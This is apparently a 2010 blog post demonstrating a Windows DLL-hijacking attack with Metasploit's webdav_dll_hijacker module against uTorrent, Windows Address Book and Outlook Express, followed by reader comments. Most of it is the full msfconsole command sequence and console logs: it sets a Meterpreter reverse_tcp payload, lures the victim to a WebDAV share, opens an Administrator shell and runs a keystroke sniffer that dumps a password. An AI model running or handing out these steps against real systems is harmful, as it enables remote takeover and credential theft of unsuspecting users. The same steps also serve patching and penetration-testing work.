So, for those of you who do not follow the Metasploit project as closely as others, there was a new module included in the 10125 revision which came out on Monday. This module is kind of a huge deal, because it affects many, many Windows programs. I’ll demonstrate one in this post, but if you follow HD Moore’s article describing the flaws and how to detect them, he includes a few scripts to be able to test programs individually, which will help you discover new (and possibly unknown) affected software.
Anyway, here is a link to his blog post detailing parts of the process.
If you follow the Exploit-DB feed, you’ll notice that there’s a deluge of DLL hijacking exploits being released. Essentially, the people releasing these are simply using the scripts HD Moore provided to detect the new vulnerabilities and then releasing the details. But, with the sheer amount of exploits being released, it should give you some idea as to the seriousness of this issue and the impact that it has.
To demonstrate…
…I’m going to target uTorrent, which is undoubtedly the best Torrent client for Windows. Here is a link to the Exploit-DB post giving the details of the vulnerability.
# msfconsole
msf > use windows/browser/webdav_dll_hijacker
msf exploit(webdav_dll_hijacker) > show optionsModule options:
Name Current Setting Required Description
—- ————— ——– ———–
BASENAME policy yes The base name for the listed files.
EXTENSIONS txt yes The list of extensions to generate
SHARENAME documents yes The name of the top-level share.
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 80 yes The daemon port to listen on (do not change)
URIPATH / yes The URI to use (do not change).Exploit target:
Id Name
— —-
0 Automatic
So, here we have the module “webdav_dll_hijacker” and it’s available options. We know from the Exploit DB post that the filename needs to have a .torrent (or .btsearch) extension.
msf exploit(webdav_dll_hijacker) > set basename owned
basename => owned
msf exploit(webdav_dll_hijacker) > set extensions “torrent”
extensions => .torrent
msf exploit(webdav_dll_hijacker) > set sharename hacku
sharename => hacku
msf exploit(webdav_dll_hijacker) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(webdav_dll_hijacker) > set lport 31337
lport => 31337
msf exploit(webdav_dll_hijacker) > set lhost 1.2.3.4
lhost => 10.0.0.58
msf exploit(webdav_dll_hijacker) > exploit
[*] Exploit running as background job.[*] Started reverse handler on 1.2.3.4:31337
[*]
[*] Exploit links are now available at \\1.2.3.4\hacku\
[*]
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://1.2.3.4:80/
[*] Server started.
Now, on the victim machine, which is a Windows XP SP2 box, we browse over to \\1.2.3.4\hacku. As far as I know, this hijacking method works on all versions of Windows currently. I have not tried it on anything but XP, though. So I’d like to hear what you discover.
Once the victim has accessed the share, a bunch of information will be displayed in the MSF console. The important information comes when the victim clicks on the only file in the directory. A single click will do the job:
[*] 10.0.0.252:1195 PROPFIND /hacku/owned..torrent
[*] 10.0.0.252:1195 PROPFIND => 207 File (/hacku/owned..torrent)
[*] 10.0.0.252:1195 PROPFIND /hacku/plugin_dll.dll
[*] 10.0.0.252:1195 PROPFIND => 207 File (/hacku/plugin_dll.dll)
[*] 10.0.0.252:1195 GET => DLL Payload
[*] 10.0.0.252:1196 PROPFIND /HACKU
[*] 10.0.0.252:1196 PROPFIND => 301 (/HACKU)
[*] 10.0.0.252:1195 PROPFIND /hacku/rundll32.exe
[*] 10.0.0.252:1195 PROPFIND => 404 (/hacku/rundll32.exe)
[*] 10.0.0.252:1196 PROPFIND /HACKU/
[*] Sending stage (748544 bytes) to 10.0.0.252
[*] 10.0.0.252:1196 PROPFIND => 207 Directory (/HACKU/)
[*] 10.0.0.252:1196 PROPFIND => 207 Top-Level Directory
[*] 10.0.0.252:1195 PROPFIND /hacku/rsaenh.dll
[*] 10.0.0.252:1195 PROPFIND => 207 File (/hacku/rsaenh.dll)
[*] 10.0.0.252:1196 PROPFIND /HACKU
[*] 10.0.0.252:1196 PROPFIND => 301 (/HACKU)
[*] 10.0.0.252:1195 GET => DLL Payload
[*] 10.0.0.252:1196 PROPFIND /HACKU/
[*] 10.0.0.252:1196 PROPFIND => 207 Directory (/HACKU/)
[*] 10.0.0.252:1196 PROPFIND => 207 Top-Level Directory
[*] 10.0.0.252:1195 PROPFIND /HACKU
[*] 10.0.0.252:1195 PROPFIND => 301 (/HACKU)
[*] 10.0.0.252:1196 PROPFIND /HACKU/
[*] 10.0.0.252:1196 PROPFIND => 207 Directory (/HACKU/)
[*] 10.0.0.252:1196 PROPFIND => 207 Top-Level Directory
[*] 10.0.0.252:1195 GET => REDIRECT (/hacku/owned..torrent)
[*] Meterpreter session 1 opened (1.2.3.4:31337 -> 10.0.0.252:1197) at Tue Aug 24 12:40:12 -0500 2010
[*] 10.0.0.252:1196 PROPFIND /hacku
[*] 10.0.0.252:1196 PROPFIND => 301 (/hacku)
[*] 10.0.0.252:1195 PROPFIND /hacku/
[*] 10.0.0.252:1195 PROPFIND => 207 Directory (/hacku/)
[*] 10.0.0.252:1196 PROPFIND /hacku/desktop.ini
[*] 10.0.0.252:1196 PROPFIND => 404 (/hacku/desktop.ini)
You’ll notice on the 3rd line it makes reference to a file named “plugin_dll.dll” Metasploit automagically determined that uTorrent was looking for “plugin_dll.dll” and offered it up.
Active sessions
===============Id Type Information Connection
— —- ———– ———-
1 meterpreter VICTIM\Administrator @ VICTIM 1.2.3.4:31337 -> 10.0.0.252:1197
msf exploit(webdav_dll_hijacker) > sessions -i 1
[*] Starting interaction with 1…meterpreter > getuid
Server username: VICTIM\Administratormeterpreter > keyscan_start
Starting the keystroke sniffer…meterpreter > keyscan_dump
Dumping captured keystrokes…
my password is 1234567meterpreter >
..so on and so forth.
Once again, Metasploit makes this entire process really simple. I’m picking on uTorrent here because it was the first on the list in my reader, but there are tons and tons of other software that is vulnerable to this attack.
Update:
I figured I’d include a list of the already known pieces of software that are vulnerable to this (taken from Exploit-DB):
Windows Live Email DLL Hijacking Exploit (dwmapi.dll)
Microsoft Power Point 2010 DLL Hijacking Exploit (pptimpconv.dll)
Wireshark <= 1.2.10 DLL Hijacking Exploit (airpcap.dll)
uTorrent <= 2.0.3 DLL Hijacking Exploit (plugin_dll.dll)
* Outlook Express 6 (6.00.2900.2180) (mapi32x.dll)
* Windows Address Book (wab32res.dll)
Find a continually growing list here
If you come across any, please post them in the comments and I’ll update the post to include them.
Update 2:
I just came across a really well written article from SANS that goes in to the details behind this attack. Check it out
Update 3:
I just discovered one that I haven’t seen yet that is a bit more universal than most of the others that I’ve come across. Windows Address Book when opening .vcf files requests “wab32res.dll” and is vulnerable to hijacking.
[*] 10.0.0.252:1137 PROPFIND /hacku
[*] 10.0.0.252:1137 PROPFIND => 301 (/hacku)
[*] 10.0.0.252:1133 PROPFIND /hacku/
[*] 10.0.0.252:1133 PROPFIND => 207 Directory (/hacku/)
[*] 10.0.0.252:1133 PROPFIND => 207 Top-Level Directory
[*] 10.0.0.252:1137 PROPFIND /hacku/wab32res.dll
[*] 10.0.0.252:1137 PROPFIND => 207 File (/hacku/wab32res.dll)
[*] 10.0.0.252:1133 GET => DLL Payload
[*] 10.0.0.252:1137 PROPFIND /hacku/rundll32.exe
[*] 10.0.0.252:1137 PROPFIND => 404 (/hacku/rundll32.exe)
[*] 10.0.0.252:1133 GET => DATA (/hacku/owned.vcf)
[*] Sending stage (748544 bytes) to 10.0.0.252
[*] Meterpreter session 4 opened (1.2.3.4:31337 -> 10.0.0.252:1155) at Tue Aug 24 13:49:02 -0500 2010
Update 4:
I just found yet another.. Outlook Express when opening .eml files requests quite a few different DLL’s.. it appears to be the “mapi32x.dll” that is the vulnerable one, howerver.
[*] 10.0.0.252:1196 PROPFIND /hacku/”%ProgramFiles%/Internet Explorer/Connection Wizard”/ICWCONN1.EXE
[*] 10.0.0.252:1196 PROPFIND => 404 (/hacku/”%ProgramFiles%/Internet Explorer/Connection Wizard”/ICWCONN1.EXE)
[*] 10.0.0.252:1196 PROPFIND /hacku/mapisvc.inf
[*] 10.0.0.252:1196 PROPFIND => 207 File (/hacku/mapisvc.inf)
[*] 10.0.0.252:1196 PROPFIND /hacku/mapi32x.dll
[*] 10.0.0.252:1196 PROPFIND => 207 File (/hacku/mapi32x.dll)
[*] 10.0.0.252:1196 GET => DLL Payload
[*] 10.0.0.252:1196 PROPFIND /hacku/rundll32.exe
[*] 10.0.0.252:1196 PROPFIND => 404 (/hacku/rundll32.exe)
[*] Sending stage (748544 bytes) to 10.0.0.252
[*] 10.0.0.252:1196 PROPFIND /hacku/ieframe.dll
[*] 10.0.0.252:1196 PROPFIND => 207 File (/hacku/ieframe.dll)
[*] 10.0.0.252:1196 PROPFIND /hacku/en-US/ieframe.dll.mui
[*] 10.0.0.252:1196 PROPFIND => 207 File (/hacku/en-US/ieframe.dll.mui)
[*] 10.0.0.252:1196 GET => DATA (/hacku/en-US/ieframe.dll.mui)
[*] 10.0.0.252:1196 PROPFIND /hacku/en/ieframe.dll.mui
[*] 10.0.0.252:1196 PROPFIND => 207 File (/hacku/en/ieframe.dll.mui)
[*] 10.0.0.252:1196 GET => DATA (/hacku/en/ieframe.dll.mui)
[*] 10.0.0.252:1196 PROPFIND /hacku/ieframe.dll.mui
[*] 10.0.0.252:1196 PROPFIND => 207 File (/hacku/ieframe.dll.mui)
[*] 10.0.0.252:1196 GET => DATA (/hacku/ieframe.dll.mui)
[*] 10.0.0.252:1196 PROPFIND /hacku/rsaenh.dll
[*] 10.0.0.252:1196 PROPFIND => 207 File (/hacku/rsaenh.dll)
[*] 10.0.0.252:1196 GET => DLL Payload
[*] Meterpreter session 5 opened (1.2.3.4:31337 -> 10.0.0.252:1197) at Tue Aug 24 14:04:45 -0500 2010
Related posts:
You may add this to your list…
- program: Office 2007
- app: Word / format: docx / module: rpawinet.dll
- app: Excel / format: xlsx / module: rpawinet.dll
Oops, there’s a bug in previous post. It’s *not* Excel but *Powerpoint* and the format is not .xlsx but .pptx. Sorry for the mess.
@exceed: I did see PowerPoint mentioned somewhere already.. but I hadn’t seen Word yet. Thanks!!
[...] big “zero-day” exploit this week was the malicious Windows DLL payload brought to the spotlight by Rapid7’s HD Moore. Two other researchers appear to have [...]
Hi,
You are referring to “Microsoft Power Point 2010 DLL Hijacking Exploit (pptimpconv.dll)”. Did you try it? Did it work? It didn’t work for me. I’ve checked powerpoint other office 2010 apps with Process Monitor and couldn’t find any dll hijacking vulnerabilities.
@nobody: I actually don’t have PowerPoint, but I have seen a few articles indicating that it’s vulnerable. I’ll see if I can recreate it myself and post an update.
@exceed,
did you checked the office/word 2007? Did you try it? Does it work?
I cannot get it working. I’ve checked the way described and by the process monitor.